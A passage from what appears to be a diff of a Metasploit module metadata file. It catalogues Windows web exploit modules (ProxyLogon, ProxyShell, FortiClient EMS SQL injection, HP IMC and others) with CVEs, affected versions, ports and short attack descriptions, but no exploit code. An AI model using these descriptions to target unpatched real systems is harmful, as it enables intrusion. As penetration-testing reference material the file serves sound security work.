Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 
15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.", + "references": [ + "CVE-2021-26855", + "CVE-2021-27065", + "LOGO-https://proxylogon.com/images/logo.jpg", + "URL-https://proxylogon.com/", + "URL-http://aka.ms/exchangevulns", + "URL-https://www.praetorian.com/blog/reproducing-proxylogon-exploit", + "URL-https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265", + "URL-https://www.o2oxy.cn/3169.html", + "URL-https://github.com/praetorian-inc/proxylogon-exploit", + "URL-https://github.com/Zeop-CyberSec/proxylogon_writeup" + ], + "platform": "Windows", + "arch": "cmd, x64, x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Powershell", + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2023-02-08 15:20:32 +0000", + "path": "/modules/exploits/windows/http/exchange_proxylogon_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_proxylogon_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "AKA": [ + "ProxyLogon" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/exchange_proxynotshell_rce": { + "name": "Microsoft Exchange ProxyNotShell RCE", + "fullname": "exploit/windows/http/exchange_proxynotshell_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-09-28", + "type": "exploit", + "author": [ + "Orange Tsai", + "Spencer McIntyre", + "DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q", + "Piotr Bazydło", + "Rich Warren", + "Soroush 
Dalili" + ], + "description": "This module chains two vulnerabilities on Microsoft Exchange Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.", + "references": [ + "CVE-2022-41040", + "CVE-2022-41082", + "URL-https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend", + "URL-https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", + "URL-https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9", + "URL-https://rw.md/2022/11/09/ProxyNotRelay.html" + ], + "platform": "Windows", + "arch": "cmd, x64, x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2022-11-28 10:06:14 +0000", + "path": "/modules/exploits/windows/http/exchange_proxynotshell_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_proxynotshell_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "AKA": [ + "ProxyNotShell" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_proxyshell_rce": { + "name": "Microsoft Exchange ProxyShell RCE", + "fullname": "exploit/windows/http/exchange_proxyshell_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-04-06", + "type": "exploit", + "author": 
[ + "Orange Tsai", + "Jang ( ", + "PeterJson", + "brandonshi123", + "mekhalleh (RAMELLA Sébastien)", + "Donny Maasland", + "Rich Warren", + "Spencer McIntyre", + "wvu " + ], + "description": "This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.", + "references": [ + "CVE-2021-34473", + "CVE-2021-34523", + "CVE-2021-31207", + "URL-https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "URL-https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf", + "URL-https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/", + "URL-https://github.com/dmaasland/proxyshell-poc" + ], + "platform": "Windows", + "arch": "cmd, x64, x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Powershell", + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2022-12-02 15:55:10 +0000", + "path": "/modules/exploits/windows/http/exchange_proxyshell_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_proxyshell_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "AKA": 
[ + "ProxyShell" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/ezserver_http": { + "name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability", + "fullname": "exploit/windows/http/ezserver_http", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-18", + "type": "exploit", + "author": [ + "modpr0be " + ], + "description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.", + "references": [ + "OSVDB-83065", + "BID-54056", + "EDB-19266", + "URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ezserver_http.rb", + "is_install_path": true, + "ref_name": "windows/http/ezserver_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/fdm_auth_header": { + "name": "Free Download Manager Remote Control Server Buffer Overflow", + "fullname": "exploit/windows/http/fdm_auth_header", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-02-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Free Download Manager\n Remote Control 2.5 Build 758. 
When sending a specially crafted\n Authorization header, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-0183", + "OSVDB-51745" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Free Download Manager 2.5 Build 758" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/fdm_auth_header.rb", + "is_install_path": true, + "ref_name": "windows/http/fdm_auth_header", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/file_sharing_wizard_seh": { + "name": "File Sharing Wizard - POST SEH Overflow", + "fullname": "exploit/windows/http/file_sharing_wizard_seh", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-09-24", + "type": "exploit", + "author": [ + "x00pwn", + "Dean Welch " + ], + "description": "This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.", + "references": [ + "CVE-2019-16724", + "EDB-47412" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Vista / Windows 7 (x86)" + ], + "mod_time": "2020-03-05 14:48:37 +0000", + "path": "/modules/exploits/windows/http/file_sharing_wizard_seh.rb", + "is_install_path": true, + "ref_name": "windows/http/file_sharing_wizard_seh", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/flexdotnetcms_upload_exec": { + "name": "FlexDotnetCMS Arbitrary ASP File Upload", + "fullname": 
"exploit/windows/http/flexdotnetcms_upload_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-09-28", + "type": "exploit", + "author": [ + "Erik Wynter" + ], + "description": "This module exploits an arbitrary file upload vulnerability in\n FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary\n commands with elevated privileges.\n\n The module first tries to authenticate to FlexDotnetCMS via an HTTP\n POST request to `/login`. It then attempts to upload a random TXT\n file and subsequently uses the FlexDotnetCMS file editor to rename\n the TXT file to an ASP file. If this succeeds, the target is\n vulnerable and the ASP file is generated as a copy of the TXT file,\n which remains on the server.\n\n Next, the module sends another request to rename the TXT file to an\n ASP file, this time adding the payload. Finally, the module tries\n to execute the ASP payload via a simple HTTP GET request to\n `/media/uploads/asp_payload`\n\n Valid credentials for a FlexDotnetCMS user with permissions to use\n the FileManager are required. 
This module has been successfully\n tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.", + "references": [ + "CVE-2020-27386" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/flexdotnetcms_upload_exec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/forticlient_ems_fctid_sqli": { + "name": "FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE", + "fullname": "exploit/windows/http/forticlient_ems_fctid_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-04-21", + "type": "exploit", + "author": [ + "Zach Hanley", + "James Horseman", + "jheysel-r7", + "Spencer McIntyre" + ], + "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n can be sent directly into database queries.\n\n FcmDaemon.exe is the main service responsible for communicating with enrolled clients. 
By default it listens on port 8013\n and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n execution in the context of NT AUTHORITY\\SYSTEM\n\n Affected versions of FortiClient EMS include:\n 7.2.0 through 7.2.2\n 7.0.1 through 7.0.10\n\n Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n EMS for the necessary vulnerable services to be available.", + "references": [ + "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/", + "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/", + "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py", + "CVE-2023-48788" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2024-07-25 09:14:27 +0000", + "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb", + "is_install_path": true, + "ref_name": "windows/http/forticlient_ems_fctid_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/fortilogger_arbitrary_fileupload": { + "name": "FortiLogger Arbitrary File Upload Exploit", + 
"fullname": "exploit/windows/http/fortilogger_arbitrary_fileupload", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-26", + "type": "exploit", + "author": [ + "Berkan Er " + ], + "description": "This module exploits an unauthenticated arbitrary file upload\n via insecure POST request. It has been tested on versions < 5.2.0 in\n Windows 10 Enterprise.", + "references": [ + "CVE-2021-3378", + "URL-https://erberkan.github.io/2021/cve-2021-3378/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "FortiLogger < 5.2.0" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb", + "is_install_path": true, + "ref_name": "windows/http/fortilogger_arbitrary_fileupload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/generic_http_dll_injection": { + "name": "Generic Web Application DLL Injection", + "fullname": "exploit/windows/http/generic_http_dll_injection", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-03-04", + "type": "exploit", + "author": [ + "Matthew Hall " + ], + "description": "This is a general-purpose module for exploiting conditions where a HTTP request\n triggers a DLL load from an specified SMB share. 
This module serves payloads as\n DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would\n trigger the load of the DLL.", + "references": [ + "CWE-427" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/generic_http_dll_injection.rb", + "is_install_path": true, + "ref_name": "windows/http/generic_http_dll_injection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/geutebrueck_gcore_x64_rce_bo": { + "name": "Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE", + "fullname": "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-01-24", + "type": "exploit", + "author": [ + "Luca Cappiello", + "Maurice Popp" + ], + "description": "This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).\n The vulnerable webserver is running on Port 13003 and Port 13004, does not require\n authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).", + "references": [ + "EDB-41153", + "CVE-2017-11517", + "URL-https://www.geutebrueck.com" + ], + "platform": "Windows", + "arch": "", + "rport": 13003, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Targeting", + "GCore 1.3.8.42, Windows x64 (Win7+)", + "GCore 1.4.2.37, Windows x64 (Win7+)" + ], + "mod_time": "2024-04-17 13:00:41 +0000", + "path": "/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb", + "is_install_path": true, + "ref_name": "windows/http/geutebrueck_gcore_x64_rce_bo", + "check": true, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/git_lfs_rce": { + "name": "Git Remote Code Execution via git-lfs (CVE-2020-27955)", + "fullname": "exploit/windows/http/git_lfs_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-11-04", + "type": "exploit", + "author": [ + "Dawid Golunski", + "space-r7", + "jheysel-r7" + ], + "description": "A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker’s malicious repository using a vulnerable Git version control tool", + "references": [ + "CVE-2020-27955", + "URL-https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Git LFS <= 2.12" + ], + "mod_time": "2021-09-14 16:32:25 +0000", + "path": "/modules/exploits/windows/http/git_lfs_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/git_lfs_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/gitstack_rce": { + "name": "GitStack Unsanitized Argument RCE", + "fullname": "exploit/windows/http/gitstack_rce", + "aliases": [], + "rank": 500, + "disclosure_date": "2018-01-15", + "type": "exploit", + "author": [ + "Kacper Szurek", + "Jacob Robles" + ], + "description": "This module exploits a remote code execution vulnerability that\n exists in GitStack through v2.3.10, caused by an unsanitized argument\n 
being passed to an exec function call. This module has been tested\n on GitStack v2.3.10.", + "references": [ + "CVE-2018-5955", + "EDB-43777", + "EDB-44044", + "URL-https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/gitstack_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/gitstack_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_autopass_license_traversal": { + "name": "HP AutoPass License Server File Upload", + "fullname": "exploit/windows/http/hp_autopass_license_traversal", + "aliases": [], + "rank": 500, + "disclosure_date": "2014-01-10", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in HP AutoPass License Server. It abuses two\n weaknesses in order to get its objective. First, the AutoPass application doesn't enforce\n authentication in the CommunicationServlet component. Second, it's possible to abuse a\n directory traversal when uploading files thorough the same component, allowing to upload\n an arbitrary payload embedded in a JSP. 
The module has been tested successfully on\n HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.", + "references": [ + "CVE-2013-6221", + "ZDI-14-195", + "BID-67989", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125" + ], + "platform": "Java", + "arch": "java", + "rport": 5814, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", + "Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", + "Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", + "Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_autopass_license_traversal.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_autopass_license_traversal", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_imc_bims_upload": { + "name": "HP Intelligent Management Center BIMS UploadServlet Directory Traversal", + "fullname": "exploit/windows/http/hp_imc_bims_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-10-08", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS\n component from the HP Intelligent Management Center. The vulnerability exists in the\n UploadServlet, allowing the user to download and upload arbitrary files. 
This module has\n been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows\n 2003 SP2.", + "references": [ + "CVE-2013-4822", + "OSVDB-98247", + "BID-62895", + "ZDI-13-238", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425" + ], + "platform": "Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_imc_bims_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_imc_bims_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_imc_java_deserialize": { + "name": "HP Intelligent Management Java Deserialization RCE", + "fullname": "exploit/windows/http/hp_imc_java_deserialize", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-10-03", + "type": "exploit", + "author": [ + "Steven Seeley (mr_me) of Offensive Security", + "Carsten " + ], + "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of\n Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required to exploit\n this vulnerability.\n\n The specific flaw exists within the WebDMDebugServlet, which listens on TCP ports 8080 and 8443 by\n default. The issue results from the lack of proper validation of user-supplied data, which can result\n in deserialization of untrusted data. 
An attacker can leverage this vulnerability to execute arbitrary\n code in the context of SYSTEM.", + "references": [ + "CVE-2017-12557", + "URL-https://github.com/pimps/ysoserial-modified/blob/master/src/main/java/ysoserial/payloads/JSON1.java", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-17-832/" + ], + "platform": "Windows", + "arch": "", + "rport": "8080", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HPE IMC 7.3 E0504P2 and earlier / Windows" + ], + "mod_time": "2021-02-16 14:36:38 +0000", + "path": "/modules/exploits/windows/http/hp_imc_java_deserialize.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_imc_java_deserialize", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_imc_mibfileupload": { + "name": "HP Intelligent Management Center Arbitrary File Upload", + "fullname": "exploit/windows/http/hp_imc_mibfileupload", + "aliases": [], + "rank": 500, + "disclosure_date": "2013-03-07", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in HP Intelligent Management Center.\n The vulnerability exists in the mibFileUpload which is accepting unauthenticated\n file uploads and handling zip contents in an insecure way. Combining both weaknesses\n a remote attacker can accomplish arbitrary file upload. 
This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.", + "references": [ + "CVE-2012-5201", + "OSVDB-91026", + "BID-58385", + "ZDI-13-050", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276" + ], + "platform": "Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP Intelligent Management Center 5.1 E0202 / Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_imc_mibfileupload.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_imc_mibfileupload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_loadrunner_copyfiletoserver": { + "name": "HP LoadRunner EmulationAdmin Web Service Directory Traversal", + "fullname": "exploit/windows/http/hp_loadrunner_copyfiletoserver", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-10-30", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability in version 11.52 of HP\n LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically\n in the copyFileToServer method, allowing the upload of arbitrary files. 
This module has\n been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2.", + "references": [ + "CVE-2013-4837", + "OSVDB-99231", + "BID-63475", + "ZDI-13-259", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437" + ], + "platform": "Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP LoadRunner 11.52" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_loadrunner_copyfiletoserver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_mpa_job_acct": { + "name": "HP Managed Printing Administration jobAcct Remote Command Execution", + "fullname": "exploit/windows/http/hp_mpa_job_acct", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-12-21", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module exploits an arbitrary file upload vulnerability on HP Managed Printing\n Administration 2.6.3 and prior versions. The vulnerability exists in the UploadFiles()\n function from the MPAUploader.Uploader.1 control, loaded and used by the server.\n The function can be abused via directory traversal and null byte injection in order\n to achieve arbitrary file upload. In order to exploit successfully, a few conditions\n must be met. First, a writable location under the context of Internet Guest Account\n (IUSR_*) or Everyone is required. By default, this module will attempt to write to\n /hpmpa/userfiles/, but the WRITEWEBFOLDER option can be used to provide\n another writable path. 
Second, the writable path must also be readable by a browser,\n so this typically means a location under wwwroot. Finally, you cannot overwrite\n a file with the same name as the payload.", + "references": [ + "CVE-2011-4166", + "OSVDB-78015", + "BID-51174", + "ZDI-11-352", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/hp_mpa_job_acct.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_mpa_job_acct", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_getnnmdata_hostname": { + "name": "HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_getnnmdata_hostname", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-1555", + "OSVDB-64976" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50", + "HP OpenView Network Node Manager 7.53" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
